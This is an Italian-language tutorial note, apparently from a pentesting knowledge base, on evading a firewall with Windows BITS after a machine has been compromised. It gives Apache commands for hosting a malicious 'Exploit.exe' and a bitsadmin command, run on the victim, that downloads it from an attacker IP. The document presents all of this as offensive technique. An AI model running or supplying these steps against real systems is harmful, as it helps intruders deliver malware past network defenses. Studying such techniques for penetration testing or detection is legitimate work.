tags: Evasione_Sistemi_di_Difesa Bitsadmin Evasione_Sistemi_di_Difesa_Windows
Evasione Firewall tramite BITS
Quando siamo riusciti ad ottenere accesso alla macchina e vogliamo trasferire un file malevolo nella macchina vittima, ma un firewall ci impedisce di trasferirlo con i metodi standard possiamo utilizzare la componente BITS presente in Windows che permette di trasferire file con qualche riga di comando da e verso web server senza essere controllato dai vari sistemi di difesa proprio perchè viene considerato un traffico legittimo, ovviamente quello che possiamo copiare e dove lo possiamo copiare dipenderà dai privilegi che abbiamo ottenuto nella compromissione della macchina, per fare questa operazione eseguiamo i seguenti passaggi:
Creazione server per trasferire il file
Apache
-
Digita
mkdir /var/www/html/sharee premi Invio per creare una cartella condivisa -
Digita
chmod -R 755 /var/www/html/sharee premi Invio -
Digita
chown -R www-data:www-data /var/www/html/sharee premi Invio -
Copia il file malevolo nella posizione condivisa digitando
cp Exploit.exe /var/www/html/sharee premendo Invio -
Lancia il comando
service apache2 start
Trasferimento file
-
Apri powershell sulla macchina vittima
-
Inserisci questo comando
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe


Questo metodo ti permette solo di trasferire file senza essere disturbato dai sistemi di difesa, ma non appena esegui il file tutti i sistemi di difesa tornano a funzionare, quindi questo exploit per esempio verrebbe individuato subito!